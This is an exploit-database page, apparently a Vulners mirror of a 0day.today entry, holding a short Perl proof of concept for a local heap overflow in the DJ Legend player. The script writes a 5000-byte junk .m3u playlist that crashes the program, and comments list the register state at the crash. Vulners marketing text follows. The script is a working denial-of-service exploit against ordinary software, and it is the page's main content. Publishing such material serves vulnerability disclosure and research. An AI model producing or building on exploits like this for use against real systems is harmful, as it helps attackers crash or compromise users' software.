Lucene search
K

DJ Legend [.m3u / .pls File ] Local Heap Overflow Poc

🗓️ 24 Jan 2010 00:00:00Reported by SkuLL-HacKeRType 
zdt
 zdt
🔗 0day.today👁 22 Views

DJ Legend Local Heap Overflow Poc - Exploi

Code
=====================================================
DJ Legend [.m3u / .pls File ] Local Heap Overflow Poc
=====================================================


#!/usr/bin/perl
# DJ Legend [.m3u / .pls File ] Local Heap Overflow Poc
# www.djlegend.net/<http://www.djlegend.net/>
# Found By : SkuLL-HacKeR
########################################################################################
#EAX 45454545
#ESP 0012EF6C
#EBP 00DA50F8 ASCII "C:\Program Files\DJ Legend Trial\SkuLL-HacKeR.m3u"
#ESI 0012EFD8
#EDI 014143F8
#EBP 00000000
#ESI 02CD7102
#EIP 7C90EAF0 ntdll.KiFastSystemCallRet
use strict;
use warnings;
my $A= "\x45" x 5000;
open(my $ofl_playlist, "> SkuLL-HacKeR.M3u");
print $ofl_playlist
$A.
"\r\n";
close $ofl_playlist;



#  0day.today [2018-04-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Jan 2010 00:00Current
7High risk
Vulners AI Score7
22